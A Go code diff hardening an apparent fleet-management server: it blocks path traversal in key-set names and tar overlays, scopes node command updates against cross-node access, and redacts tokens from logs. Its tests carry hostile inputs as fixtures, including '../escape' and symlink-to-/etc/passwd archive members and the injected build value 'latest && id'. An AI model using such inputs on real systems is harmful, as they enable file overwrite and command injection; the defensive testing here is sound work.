+	}
+	return nil
 }
 
 // ExportImage handles GET /api/v1/artifacts/:id/image.

--- a/pkg/handlers/artifacts.go
+++ b/pkg/handlers/artifacts.go
@@ -256,6 +256,12 @@ func (h *ArtifactHandler) Create(c echo.Context) error {
 
 	status, err := h.builder.Build(ctx, opts)
 	if err != nil {
+		// Invalid admin-supplied build inputs are a client error (400), not a
+		// server fault (500). The validation detail (field + "invalid") is safe
+		// to surface; it carries no secrets.
+		if errors.Is(err, builder.ErrInvalidBuildOptions) {
+			return c.JSON(http.StatusBadRequest, map[string]string{"error": err.Error()})
+		}
 		return c.JSON(http.StatusInternalServerError, map[string]string{"error": "failed to start build"})
 	}
 

--- a/pkg/handlers/artifacts_overlay_test.go
+++ b/pkg/handlers/artifacts_overlay_test.go
@@ -1,0 +1,182 @@
+package handlers_test
+
+import (
+	"archive/tar"
+	"bytes"
+	"compress/gzip"
+	"encoding/json"
+	"mime/multipart"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+
+	. "github.com/onsi/ginkgo/v2"
+	. "github.com/onsi/gomega"
+
+	"github.com/kairos-io/AuroraBoot/pkg/handlers"
+	"github.com/labstack/echo/v4"
+)
+
+// overlayEntry is a single tar member for building test overlay archives.
+type overlayEntry struct {
+	name     string
+	data     []byte
+	mode     os.FileMode
+	typeflag byte
+	linkname string
+}
+
+// makeOverlayTarGz builds a gzipped tar from the given entries.
+func makeOverlayTarGz(entries []overlayEntry) []byte {
+	var buf bytes.Buffer
+	gz := gzip.NewWriter(&buf)
+	tw := tar.NewWriter(gz)
+	for _, e := range entries {
+		tf := e.typeflag
+		if tf == 0 {
+			tf = tar.TypeReg
+		}
+		hdr := &tar.Header{
+			Name:     e.name,
+			Mode:     int64(e.mode),
+			Size:     int64(len(e.data)),
+			Typeflag: tf,
+			Linkname: e.linkname,
+		}
+		Expect(tw.WriteHeader(hdr)).To(Succeed())
+		if len(e.data) > 0 {
+			_, err := tw.Write(e.data)
+			Expect(err).NotTo(HaveOccurred())
+		}
+	}
+	Expect(tw.Close()).To(Succeed())
+	Expect(gz.Close()).To(Succeed())
+	return buf.Bytes()
+}
+
+// uploadOverlayMultipart wraps an archive as a multipart upload under the
+// "files" field, matching what UploadOverlay reads.
+func uploadOverlayMultipart(body []byte, filename string) (*bytes.Buffer, string) {
+	var buf bytes.Buffer
+	w := multipart.NewWriter(&buf)
+	fw, err := w.CreateFormFile("files", filename)
+	Expect(err).NotTo(HaveOccurred())
+	_, err = fw.Write(body)
+	Expect(err).NotTo(HaveOccurred())
+	Expect(w.Close()).To(Succeed())
+	return &buf, w.FormDataContentType()
+}
+
+var _ = Describe("ArtifactHandler UploadOverlay extraction", func() {
+	var (
+		e            *echo.Echo
+		handler      *handlers.ArtifactHandler
+		artifactsDir string
+	)
+
+	BeforeEach(func() {
+		e = echo.New()
+		var err error
+		artifactsDir, err = os.MkdirTemp("", "overlay-test-")
+		Expect(err).NotTo(HaveOccurred())
+		handler = handlers.NewArtifactHandler(&fakeBuilder{}, nil, nil, nil, artifactsDir, "reg-token", "http://localhost:8080")
+	})
+
+	AfterEach(func() {
+		os.RemoveAll(artifactsDir)
+	})
+
+	// doUpload posts the archive and returns the recorder.
+	doUpload := func(body []byte) *httptest.ResponseRecorder {
+		buf, contentType := uploadOverlayMultipart(body, "overlay.tar.gz")
+		req := httptest.NewRequest(http.MethodPost, "/api/v1/artifacts/upload-overlay", buf)
+		req.Header.Set(echo.HeaderContentType, contentType)
+		rec := httptest.NewRecorder()
+		c := e.NewContext(req, rec)
+		Expect(handler.UploadOverlay(c)).To(Succeed())
+		return rec
+	}
+
+	It("extracts a valid overlay archive correctly", func() {
+		body := makeOverlayTarGz([]overlayEntry{
+			{name: "etc/", typeflag: tar.TypeDir, mode: 0o755},
+			{name: "etc/config.yaml", data: []byte("foo: bar\n"), mode: 0o644},
+			{name: "opt/app/run.sh", data: []byte("#!/bin/sh\n"), mode: 0o755},
+		})
+		rec := doUpload(body)
+		Expect(rec.Code).To(Equal(http.StatusOK))
+
+		var resp struct {
+			Path string `json:"path"`
+		}
+		Expect(json.Unmarshal(rec.Body.Bytes(), &resp)).To(Succeed())
+		Expect(resp.Path).NotTo(BeEmpty())
+
+		data, err := os.ReadFile(filepath.Join(resp.Path, "etc/config.yaml"))
+		Expect(err).NotTo(HaveOccurred())
+		Expect(data).To(Equal([]byte("foo: bar\n")))
+		data, err = os.ReadFile(filepath.Join(resp.Path, "opt/app/run.sh"))
+		Expect(err).NotTo(HaveOccurred())
+		Expect(data).To(Equal([]byte("#!/bin/sh\n")))
+	})
+
+	It("rejects an archive with a ../ traversal member and writes nothing outside overlayDir", func() {
+		body := makeOverlayTarGz([]overlayEntry{
+			{name: "../escape", data: []byte("PWNED"), mode: 0o644},
+		})
+		rec := doUpload(body)
+		Expect(rec.Code).To(Equal(http.StatusBadRequest))
+
+		// The escape target lives one level above overlays/<uuid> i.e. under
+		// artifactsDir/overlays. Nothing should have been written anywhere
+		// outside the per-upload overlay dir.
+		_, err := os.Stat(filepath.Join(artifactsDir, "overlays", "escape"))
+		Expect(os.IsNotExist(err)).To(BeTrue())
+		_, err = os.Stat(filepath.Join(artifactsDir, "escape"))
+		Expect(os.IsNotExist(err)).To(BeTrue())
+	})
+
+	It("rejects an archive with an absolute-path member", func() {
+		escape := filepath.Join(artifactsDir, "abs-escape")
+		body := makeOverlayTarGz([]overlayEntry{
+			{name: escape, data: []byte("PWNED"), mode: 0o644},
+		})
+		rec := doUpload(body)
+		Expect(rec.Code).To(Equal(http.StatusBadRequest))
+		_, err := os.Stat(escape)
+		Expect(os.IsNotExist(err)).To(BeTrue())
+	})
+
+	It("rejects an archive containing a symlink member", func() {
+		body := makeOverlayTarGz([]overlayEntry{
+			{name: "link", typeflag: tar.TypeSymlink, linkname: "/etc/passwd", mode: 0o777},
+		})
+		rec := doUpload(body)
+		Expect(rec.Code).To(Equal(http.StatusBadRequest))
+	})
+
+	It("rejects an oversized archive at the cap", func() {
+		// A single member declaring a size beyond the per-file cap is rejected
+		// without materializing the bytes.
+		var buf bytes.Buffer
+		gz := gzip.NewWriter(&buf)
+		tw := tar.NewWriter(gz)
+		hdr := &tar.Header{
+			Name:     "big.bin",
+			Mode:     0o644,
+			Size:     int64(256*1024*1024) + 1, // one byte over maxOverlayFileSize
+			Typeflag: tar.TypeReg,
+		}
+		Expect(tw.WriteHeader(hdr)).To(Succeed())
+		// Write a little real data; the header size is what triggers the cap.
+		_, err := tw.Write(bytes.Repeat([]byte{0}, 1024))
+		Expect(err).NotTo(HaveOccurred())
+		// Do not close tw cleanly with full data — we only need the header read.
+		_ = tw.Flush()
+		_ = gz.Close()
+
+		rec := doUpload(buf.Bytes())
+		Expect(rec.Code).To(Equal(http.StatusBadRequest))
+	})
+})

--- a/pkg/handlers/artifacts_test.go
+++ b/pkg/handlers/artifacts_test.go
@@ -2,6 +2,7 @@ package handlers_test
 
 import (
 	"encoding/json"
+	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"strings"
@@ -44,6 +45,44 @@ var _ = Describe("ArtifactHandler", func() {
 			Expect(json.Unmarshal(rec.Body.Bytes(), &status)).To(Succeed())
 			Expect(status.Phase).To(Equal(builder.BuildPending))
 			Expect(status.ID).NotTo(BeEmpty())
+		})
+
+		It("returns 400 (not 500) when build inputs fail validation", func() {
+			// The real builder rejects shell-metacharacter values like this
+			// before any build starts and returns an ErrInvalidBuildOptions-wrapped
+			// error; the handler must surface that as a client error.
+			fb.buildErr = fmt.Errorf("%w: invalid kairos version %q", builder.ErrInvalidBuildOptions, "latest && id")
+
+			body := `{"baseImage":"quay.io/kairos/ubuntu:24.04","kairosVersion":"latest && id","outputs":{"iso":true}}`
+			req := httptest.NewRequest(http.MethodPost, "/api/v1/artifacts", strings.NewReader(body))
+			req.Header.Set("Content-Type", "application/json")
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+
+			err := handler.Create(c)
+			Expect(err).NotTo(HaveOccurred())
+			Expect(rec.Code).To(Equal(http.StatusBadRequest))
+
+			var resp map[string]string
+			Expect(json.Unmarshal(rec.Body.Bytes(), &resp)).To(Succeed())
+			Expect(resp["error"]).To(ContainSubstring("invalid build options"))
+
+			// The rejected request must not have been queued.
+			Expect(fb.builds).To(BeEmpty())
+		})
+
+		It("returns 500 for a genuine server failure", func() {
+			fb.buildErr = fmt.Errorf("disk full")
+
+			body := `{"baseImage":"quay.io/kairos/ubuntu:24.04","outputs":{"iso":true}}`
+			req := httptest.NewRequest(http.MethodPost, "/api/v1/artifacts", strings.NewReader(body))
+			req.Header.Set("Content-Type", "application/json")
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+
+			err := handler.Create(c)
+			Expect(err).NotTo(HaveOccurred())
+			Expect(rec.Code).To(Equal(http.StatusInternalServerError))
 		})
 	})
 

--- a/pkg/handlers/commands.go
+++ b/pkg/handlers/commands.go
@@ -1,9 +1,11 @@
 package handlers
 
 import (
+	"errors"
 	"net/http"
 
 	"github.com/google/uuid"
+	"github.com/kairos-io/AuroraBoot/pkg/auth"
 	"github.com/kairos-io/AuroraBoot/pkg/store"
 	"github.com/kairos-io/AuroraBoot/pkg/ws"
 	"github.com/labstack/echo/v4"
@@ -201,6 +203,12 @@ type updateStatusRequest struct {
 }
 
 // UpdateStatus handles PUT /api/v1/nodes/:nodeID/commands/:commandID/status.
+//
+// This handler is mounted on both the agent group (node API key) and the admin
+// group (admin bearer). For agent callers we scope the update to the
+// authenticated node: a node may only update the status of commands addressed
+// to it, never another node's (BOLA). Admins legitimately act across nodes, so
+// their updates are unscoped.
 func (h *CommandHandler) UpdateStatus(c echo.Context) error {
 	commandID := c.Param("commandID")
 	var req updateStatusRequest
@@ -212,7 +220,24 @@ func (h *CommandHandler) UpdateStatus(c echo.Context) error {
 		return c.JSON(http.StatusBadRequest, map[string]string{"error": "phase is required"})
 	}
 
-	if err := h.commands.UpdateStatus(c.Request().Context(), commandID, req.Phase, req.Result); err != nil {
+	ctx := c.Request().Context()
+
+	// Agent request: node API key auth set the node identity. Scope the update
+	// to that node so a foreign or non-existent command surfaces as 403 rather
+	// than a silent success (gorm Updates returns nil on zero matched rows).
+	if authNodeID := auth.AuthNodeID(c); authNodeID != "" {
+		err := h.commands.UpdateStatusForNode(ctx, commandID, authNodeID, req.Phase, req.Result)
+		if errors.Is(err, store.ErrCommandNotFound) {
+			return c.JSON(http.StatusForbidden, map[string]string{"error": "forbidden"})
+		}
+		if err != nil {
+			return c.JSON(http.StatusInternalServerError, map[string]string{"error": "failed to update command status"})
+		}
+		return c.JSON(http.StatusOK, map[string]string{"status": "ok"})
+	}
+
+	// Admin request: act across nodes.
+	if err := h.commands.UpdateStatus(ctx, commandID, req.Phase, req.Result); err != nil {
 		return c.JSON(http.StatusInternalServerError, map[string]string{"error": "failed to update command status"})
 	}
 

--- a/pkg/handlers/commands_test.go
+++ b/pkg/handlers/commands_test.go
@@ -9,6 +9,7 @@ import (
 	. "github.com/onsi/ginkgo/v2"
 	. "github.com/onsi/gomega"
 
+	"github.com/kairos-io/AuroraBoot/pkg/auth"
 	"github.com/kairos-io/AuroraBoot/pkg/handlers"
 	"github.com/kairos-io/AuroraBoot/pkg/store"
 	"github.com/labstack/echo/v4"
@@ -207,6 +208,61 @@ var _ = Describe("CommandHandler", func() {
 			err := handler.UpdateStatus(c)
 			Expect(err).NotTo(HaveOccurred())
 			Expect(rec.Code).To(Equal(http.StatusBadRequest))
+		})
+
+		// Agent callers (node API key auth sets the node identity in context)
+		// may only update commands addressed to them. The path :nodeID has
+		// already been bound to the identity by RequireNodeMatch, so the risk
+		// here is a foreign commandID under the node's own path.
+		It("lets an agent update its own command", func() {
+			cs.cmds = []*store.NodeCommand{
+				{ID: "cmd-own", ManagedNodeID: "node-1", Phase: store.CommandDelivered},
+			}
+			body := `{"phase":"Completed","result":"ok"}`
+			req := httptest.NewRequest(http.MethodPut, "/api/v1/nodes/node-1/commands/cmd-own/status", strings.NewReader(body))
+			req.Header.Set("Content-Type", "application/json")
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+			c.SetParamNames("nodeID", "commandID")
+			c.SetParamValues("node-1", "cmd-own")
+			c.Set(auth.ContextKeyNodeID, "node-1")
+
+			Expect(handler.UpdateStatus(c)).To(Succeed())
+			Expect(rec.Code).To(Equal(http.StatusOK))
+			Expect(cs.cmds[0].Phase).To(Equal(store.CommandCompleted))
+		})
+
+		It("forbids an agent updating a command it does not own (403, unchanged)", func() {
+			cs.cmds = []*store.NodeCommand{
+				{ID: "cmd-foreign", ManagedNodeID: "node-2", Phase: store.CommandDelivered},
+			}
+			body := `{"phase":"Completed","result":"pwned"}`
+			req := httptest.NewRequest(http.MethodPut, "/api/v1/nodes/node-1/commands/cmd-foreign/status", strings.NewReader(body))
+			req.Header.Set("Content-Type", "application/json")
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+			c.SetParamNames("nodeID", "commandID")
+			c.SetParamValues("node-1", "cmd-foreign")
+			c.Set(auth.ContextKeyNodeID, "node-1")
+
+			Expect(handler.UpdateStatus(c)).To(Succeed())
+			Expect(rec.Code).To(Equal(http.StatusForbidden))
+			// Foreign command must be untouched.
+			Expect(cs.cmds[0].Phase).To(Equal(store.CommandDelivered))
+		})
+
+		It("forbids an agent updating a non-existent command (403, not silent 200)", func() {
+			body := `{"phase":"Completed","result":"x"}`
+			req := httptest.NewRequest(http.MethodPut, "/api/v1/nodes/node-1/commands/missing/status", strings.NewReader(body))
+			req.Header.Set("Content-Type", "application/json")
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+			c.SetParamNames("nodeID", "commandID")
+			c.SetParamValues("node-1", "missing")
+			c.Set(auth.ContextKeyNodeID, "node-1")
+
+			Expect(handler.UpdateStatus(c)).To(Succeed())
+			Expect(rec.Code).To(Equal(http.StatusForbidden))
 		})
 	})
 })

--- a/pkg/handlers/fakes_test.go
+++ b/pkg/handlers/fakes_test.go
@@ -437,12 +437,21 @@ type fakeBuilder struct {
 	mu       sync.Mutex
 	builds   []*builder.BuildStatus
 	lastOpts builder.BuildOptions // lets tests assert on the generated cloud-config
+	// buildErr, when set, is returned from Build instead of starting a build.
+	// Tests use it to exercise the handler's error-to-status mapping without a
+	// real builder.
+	buildErr error
 }
 
 func (f *fakeBuilder) Build(_ context.Context, opts builder.BuildOptions) (*builder.BuildStatus, error) {
 	f.mu.Lock()
 	defer f.mu.Unlock()
 	f.lastOpts = opts
+	if f.buildErr != nil {
+		// Mirror the real builder: validation failures are rejected before any
+		// build state is recorded.
+		return nil, f.buildErr
+	}
 	status := &builder.BuildStatus{
 		ID:    opts.ID,
 		Phase: builder.BuildPending,

--- a/pkg/handlers/fakes_test.go
+++ b/pkg/handlers/fakes_test.go
@@ -241,6 +241,19 @@ func (f *fakeCommandStore) UpdateStatus(_ context.Context, id string, phase stri
 	return fmt.Errorf("not found")
 }
 
+func (f *fakeCommandStore) UpdateStatusForNode(_ context.Context, id string, nodeID string, phase string, result string) error {
+	f.mu.Lock()
+	defer f.mu.Unlock()
+	for _, cmd := range f.cmds {
+		if cmd.ID == id && cmd.ManagedNodeID == nodeID {
+			cmd.Phase = phase
+			cmd.Result = result
+			return nil
+		}
+	}
+	return store.ErrCommandNotFound
+}
+
 func (f *fakeCommandStore) ListByNode(_ context.Context, nodeID string) ([]*store.NodeCommand, error) {
 	f.mu.Lock()
 	defer f.mu.Unlock()

--- a/pkg/handlers/nodes.go
+++ b/pkg/handlers/nodes.go
@@ -348,15 +348,27 @@ func (h *NodeHandler) Heartbeat(c echo.Context) error {
 }
 
 // GetCommands handles GET /api/v1/nodes/:nodeID/commands.
-// For agent requests, returns only pending commands and marks them as delivered.
+//
+// Served under AgentOrAdminMiddleware, so it handles two callers:
+//   - agent (node API key): returns only pending commands and marks them
+//     delivered, scoped to the authenticated node. A node may only read its
+//     own queue — requesting another node's :nodeID is rejected with 403
+//     (node-impersonation / BOLA).
+//   - admin (bearer): returns all commands for the requested node.
 func (h *NodeHandler) GetCommands(c echo.Context) error {
 	nodeID := c.Param("nodeID")
 
 	// Check if this is an agent request (node API key auth sets nodeID in context)
-	ctxNodeID, _ := c.Get(auth.ContextKeyNodeID).(string)
+	ctxNodeID := auth.AuthNodeID(c)
 	isAgent := ctxNodeID != ""
 
 	if isAgent {
+		// Bind the agent to its own identity: the path :nodeID must be the
+		// node the API key belongs to.
+		if ctxNodeID != nodeID {
+			return c.JSON(http.StatusForbidden, map[string]string{"error": "forbidden"})
+		}
+
 		cmds, err := h.commands.GetPending(c.Request().Context(), nodeID)
 		if err != nil {
 			return c.JSON(http.StatusInternalServerError, map[string]string{"error": "failed to get commands"})

--- a/pkg/handlers/secureboot.go
+++ b/pkg/handlers/secureboot.go
@@ -10,12 +10,31 @@ import (
 	"net/http"
 	"os"
 	"path/filepath"
+	"regexp"
 	"strings"
 
 	"github.com/kairos-io/AuroraBoot/pkg/secureboot"
 	"github.com/kairos-io/AuroraBoot/pkg/store"
 	"github.com/labstack/echo/v4"
 )
+
+// keySetNameRe is the strict allowlist for key-set names. A name is used
+// verbatim as the directory component under keysDir (and is passed to openssl
+// as part of -keyout paths), so it must never contain path separators, parent
+// references, or anything that could escape the keys directory. Letters,
+// digits, dash and underscore only, 1-64 chars.
+var keySetNameRe = regexp.MustCompile(`^[A-Za-z0-9_-]{1,64}$`)
+
+// validateKeySetName rejects any key-set name that could be used to traverse
+// outside keysDir. It intentionally refuses "." and ".." (which the regexp
+// already excludes via the missing dot) as well as empty, absolute and
+// separator-bearing names.
+func validateKeySetName(name string) error {
+	if !keySetNameRe.MatchString(name) {
+		return fmt.Errorf("invalid key set name %q: must match %s", name, keySetNameRe.String())
+	}
+	return nil
+}
 
 // maxImportSize caps the number of uncompressed bytes we'll extract from an
 // imported key set tarball. Real SecureBoot key sets are tiny (a few tens of
@@ -68,6 +87,9 @@ func (h *SecureBootHandler) GenerateKeys(c echo.Context) error {
 	}
 	if req.Name == "" {
 		return c.JSON(http.StatusBadRequest, map[string]string{"error": "name is required"})
+	}
+	if err := validateKeySetName(req.Name); err != nil {
+		return c.JSON(http.StatusBadRequest, map[string]string{"error": err.Error()})
 	}
 
 	outputDir := filepath.Join(h.keysDir, req.Name)
@@ -344,6 +366,9 @@ func (h *SecureBootHandler) ImportKeys(c echo.Context) error {
 	}
 	if name == "" {
 		return c.JSON(http.StatusBadRequest, map[string]string{"error": "manifest has no name and no ?name= override was provided"})
+	}
+	if err := validateKeySetName(name); err != nil {
+		return c.JSON(http.StatusBadRequest, map[string]string{"error": err.Error()})
 	}
 	if existing, _ := h.store.GetByName(ctx, name); existing != nil {
 		return c.JSON(http.StatusConflict, map[string]string{"error": fmt.Sprintf("a key set named %q already exists", name)})

--- a/pkg/handlers/secureboot_name_internal_test.go
+++ b/pkg/handlers/secureboot_name_internal_test.go
@@ -1,0 +1,45 @@
+package handlers
+
+import "testing"
+
+// TestValidateKeySetName checks the strict allowlist that prevents a key-set
+// name from escaping keysDir (the name is used verbatim as a directory
+// component and inside openssl -keyout paths).
+func TestValidateKeySetName(t *testing.T) {
+	t.Parallel()
+
+	valid := []string{
+		"prod",
+		"prod-keys",
+		"prod_keys_1",
+		"A",
+		"abc123",
+		"abcdefghij-abcdefghij-abcdefghij-abcdefghij-abcdefghij-abcdefg64",
+	}
+	for _, n := range valid {
+		if err := validateKeySetName(n); err != nil {
+			t.Errorf("expected %q to be accepted, got error: %v", n, err)
+		}
+	}
+
+	invalid := []string{
+		"",
+		".",
+		"..",
+		"../x",
+		"a/b",
+		"/abs",
+		"/etc/passwd",
+		"..",
+		"a b",
+		"a;b",
+		"a$b",
+		"foo.bar",
+		"this-name-is-definitely-longer-than-sixty-four-characters-so-it-must-fail",
+	}
+	for _, n := range invalid {
+		if err := validateKeySetName(n); err == nil {
+			t.Errorf("expected %q to be rejected, but it was accepted", n)
+		}
+	}
+}

--- a/pkg/handlers/secureboot_traversal_test.go
+++ b/pkg/handlers/secureboot_traversal_test.go
@@ -1,0 +1,138 @@
+package handlers_test
+
+import (
+	"context"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+
+	. "github.com/onsi/ginkgo/v2"
+	. "github.com/onsi/gomega"
+
+	"github.com/kairos-io/AuroraBoot/pkg/handlers"
+	"github.com/labstack/echo/v4"
+)
+
+var _ = Describe("SecureBootHandler key-set name traversal", func() {
+	var (
+		e       *echo.Echo
+		handler *handlers.SecureBootHandler
+		fakeSB  *fakeSecureBootKeySetStore
+		baseDir string
+		keysDir string
+		ctx     context.Context
+	)
+
+	BeforeEach(func() {
+		ctx = context.Background()
+		_ = ctx
+		e = echo.New()
+		var err error
+		// keysDir lives under baseDir so we can assert nothing was written to a
+		// sibling path outside keysDir via traversal.
+		baseDir, err = os.MkdirTemp("", "sb-traversal-")
+		Expect(err).NotTo(HaveOccurred())
+		keysDir = filepath.Join(baseDir, "keys")
+		Expect(os.MkdirAll(keysDir, 0o700)).To(Succeed())
+		fakeSB = &fakeSecureBootKeySetStore{}
+		handler = handlers.NewSecureBootHandler(fakeSB, keysDir)
+	})
+
+	AfterEach(func() {
+		os.RemoveAll(baseDir)
+	})
+
+	Describe("GenerateKeys", func() {
+		It("returns 400 for a traversal name and writes nothing outside keysDir", func() {
+			body := `{"name":"../escape"}`
+			req := httptest.NewRequest(http.MethodPost, "/api/v1/secureboot-keys/generate", strings.NewReader(body))
+			req.Header.Set(echo.HeaderContentType, echo.MIMEApplicationJSON)
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+
+			Expect(handler.GenerateKeys(c)).To(Succeed())
+			Expect(rec.Code).To(Equal(http.StatusBadRequest))
+
+			// The traversal target (baseDir/escape) must not exist.
+			_, err := os.Stat(filepath.Join(baseDir, "escape"))
+			Expect(os.IsNotExist(err)).To(BeTrue())
+			// keysDir must remain empty.
+			entries, err := os.ReadDir(keysDir)
+			Expect(err).NotTo(HaveOccurred())
+			Expect(entries).To(BeEmpty())
+		})
+
+		It("returns 400 for an absolute name", func() {
+			body := `{"name":"/etc/evil"}`
+			req := httptest.NewRequest(http.MethodPost, "/api/v1/secureboot-keys/generate", strings.NewReader(body))
+			req.Header.Set(echo.HeaderContentType, echo.MIMEApplicationJSON)
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+
+			Expect(handler.GenerateKeys(c)).To(Succeed())
+			Expect(rec.Code).To(Equal(http.StatusBadRequest))
+		})
+	})
+
+	Describe("ImportKeys", func() {
+		It("returns 400 for a traversal ?name= override and writes nothing outside keysDir", func() {
+			// A well-formed archive whose only problem is the override name.
+			manifest := keySetManifestJSON("prod")
+			body := makeCustomTarGz([]tarEntry{
+				{name: "manifest.json", data: manifest, mode: 0o644},
+				{name: "keys/db.key", data: []byte("DBKEY"), mode: 0o600},
+			})
+			buf, contentType := buildMultipart(body, "keyset.tar.gz")
+
+			req := httptest.NewRequest(http.MethodPost, "/api/v1/secureboot-keys/import?name=../escape", buf)
+			req.Header.Set(echo.HeaderContentType, contentType)
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+
+			Expect(handler.ImportKeys(c)).To(Succeed())
+			Expect(rec.Code).To(Equal(http.StatusBadRequest))
+
+			_, err := os.Stat(filepath.Join(baseDir, "escape"))
+			Expect(os.IsNotExist(err)).To(BeTrue())
+			entries, err := os.ReadDir(keysDir)
+			Expect(err).NotTo(HaveOccurred())
+			Expect(entries).To(BeEmpty())
+		})
+
+		It("returns 400 when the manifest name itself is a traversal", func() {
+			manifest := keySetManifestJSON("../escape")
+			body := makeCustomTarGz([]tarEntry{
+				{name: "manifest.json", data: manifest, mode: 0o644},
+				{name: "keys/db.key", data: []byte("DBKEY"), mode: 0o600},
+			})
+			buf, contentType := buildMultipart(body, "keyset.tar.gz")
+
+			req := httptest.NewRequest(http.MethodPost, "/api/v1/secureboot-keys/import", buf)
+			req.Header.Set(echo.HeaderContentType, contentType)
+			rec := httptest.NewRecorder()
+			c := e.NewContext(req, rec)
+
+			Expect(handler.ImportKeys(c)).To(Succeed())
+			Expect(rec.Code).To(Equal(http.StatusBadRequest))
+
+			_, err := os.Stat(filepath.Join(baseDir, "escape"))
+			Expect(os.IsNotExist(err)).To(BeTrue())
+		})
+	})
+})
+
+// keySetManifestJSON builds a valid v1 manifest with the given name.
+func keySetManifestJSON(name string) []byte {
+	m := map[string]interface{}{
+		"version":          1,
+		"kind":             "auroraboot.secureboot-keyset",
+		"name":             name,
+		"secureBootEnroll": "if-safe",
+	}
+	b, err := json.Marshal(m)
+	Expect(err).NotTo(HaveOccurred())
+	return b
+}

--- a/pkg/ops/rawDiskGeneration.go
+++ b/pkg/ops/rawDiskGeneration.go
@@ -786,12 +786,12 @@ func (r *RawImage) installGrubToDisk(image string) error {
 	// then do it in reverse to cleanup
 	// I tried but the devices didnt appear properly dur to it being in a container
 	// so I went with the easy way
-	out, err := exec.Command("losetup", "-D").CombinedOutput()
-	internal.Log.Logger.Debug().Str("output", string(out)).Msg("Detaching loop devices")
-	if err != nil {
-		return fmt.Errorf("failed to detach loop devices: %w", err)
-	}
-
+	// Attach the image to the next free loop device. We deliberately do NOT run
+	// `losetup -D` here: that detaches EVERY loop device on the host, which on a
+	// shared CI runner or the fleet `web` server would rip loop devices out from
+	// under concurrent builds, active mounts, and the host OS itself. `-f --show`
+	// allocates a single free device, and the deferred cleanup below detaches
+	// exactly that one.
 	loopDevice, err := exec.Command("losetup", "-f", "--show", image).CombinedOutput()
 	internal.Log.Logger.Debug().Str("output", string(loopDevice)).Msg("Attaching image to loop device")
 	if err != nil {
@@ -802,7 +802,7 @@ func (r *RawImage) installGrubToDisk(image string) error {
 	loopDevice = bytes.TrimSpace(loopDevice)
 
 	// Run kpartx
-	out, err = exec.Command("kpartx", "-av", string(loopDevice)).CombinedOutput()
+	out, err := exec.Command("kpartx", "-av", string(loopDevice)).CombinedOutput()
 	internal.Log.Logger.Debug().Str("output", string(out)).Msg("Running kpartx")
 	if err != nil {
 		internal.Log.Logger.Error().Str("output", string(out)).Msg("kpartx output")

--- a/pkg/server/redact_internal_test.go
+++ b/pkg/server/redact_internal_test.go
@@ -1,0 +1,65 @@
+package server
+
+import (
+	"strings"
+	"testing"
+)
+
+// TestRedactToken asserts redactToken never emits the ?token= credential while
+// preserving the path and any other query parameters. The access logger runs
+// the request URI through this helper, so a leak here means credentials land in
+// the access log.
+func TestRedactToken(t *testing.T) {
+	tests := []struct {
+		name      string
+		in        string
+		wantNoSec string // secret that must NOT appear in the output
+		want      string // exact expected output ("" = don't assert exact)
+	}{
+		{
+			name:      "token only",
+			in:        "/api/v1/ws?token=supersecret",
+			wantNoSec: "supersecret",
+			want:      "/api/v1/ws?token=REDACTED",
+		},
+		{
+			name:      "token with other params preserved",
+			in:        "/api/v1/artifacts/5/download/foo?token=secret&x=1",
+			wantNoSec: "secret",
+		},
+		{
+			name:      "no token left untouched",
+			in:        "/api/v1/nodes?limit=10",
+			wantNoSec: "",
+			want:      "/api/v1/nodes?limit=10",
+		},
+		{
+			name:      "no query string",
+			in:        "/healthz",
+			wantNoSec: "",
+			want:      "/healthz",
+		},
+		{
+			name:      "unparseable query still hides token",
+			in:        "/api/v1/ws?token=secret;%zz",
+			wantNoSec: "secret",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := redactToken(tt.in)
+
+			if tt.wantNoSec != "" && strings.Contains(got, tt.wantNoSec) {
+				t.Fatalf("redactToken(%q) = %q, leaked secret %q", tt.in, got, tt.wantNoSec)
+			}
+			if tt.want != "" && got != tt.want {
+				t.Errorf("redactToken(%q) = %q, want %q", tt.in, got, tt.want)
+			}
+			// A token param must always become REDACTED.
+			if strings.Contains(tt.in, "token=") && !strings.Contains(got, "REDACTED") {
+				t.Errorf("redactToken(%q) = %q, expected REDACTED marker", tt.in, got)
+			}
+		})
+	}
+}

--- a/pkg/server/server.go
+++ b/pkg/server/server.go
@@ -7,11 +7,11 @@ import (
 	"strings"
 
 	"github.com/kairos-io/AuroraBoot/docs"
+	netbootpkg "github.com/kairos-io/AuroraBoot/internal/netbootmgr"
+	"github.com/kairos-io/AuroraBoot/internal/ui"
 	"github.com/kairos-io/AuroraBoot/pkg/auth"
 	"github.com/kairos-io/AuroraBoot/pkg/builder"
 	"github.com/kairos-io/AuroraBoot/pkg/handlers"
-	netbootpkg "github.com/kairos-io/AuroraBoot/internal/netbootmgr"
-	"github.com/kairos-io/AuroraBoot/internal/ui"
 	"github.com/kairos-io/AuroraBoot/pkg/store"
 	"github.com/kairos-io/AuroraBoot/pkg/ws"
 	"github.com/labstack/echo/v4"
@@ -20,22 +20,22 @@ import (
 
 // Config holds all dependencies needed by the server.
 type Config struct {
-	NodeStore      store.NodeStore
-	CommandStore   store.CommandStore
-	GroupStore     store.GroupStore
-	ArtifactStore          store.ArtifactStore
-	SecureBootKeySetStore  store.SecureBootKeySetStore
-	NetbootManager         *netbootpkg.Manager
-	DeploymentStore        store.DeploymentStore
-	BMCTargetStore         store.BMCTargetStore
-	Builder                builder.ArtifactBuilder
-	AdminPassword          string
-	RegToken       string
-	RegTokenFile   string // path where reg token is persisted (for rotation)
-	AuroraBootURL    string
-	ArtifactsDir   string
-	KeysDir        string  // base directory for SecureBoot key sets
-	Hub            *ws.Hub // optional, created if nil
+	NodeStore             store.NodeStore
+	CommandStore          store.CommandStore
+	GroupStore            store.GroupStore
+	ArtifactStore         store.ArtifactStore
+	SecureBootKeySetStore store.SecureBootKeySetStore
+	NetbootManager        *netbootpkg.Manager
+	DeploymentStore       store.DeploymentStore
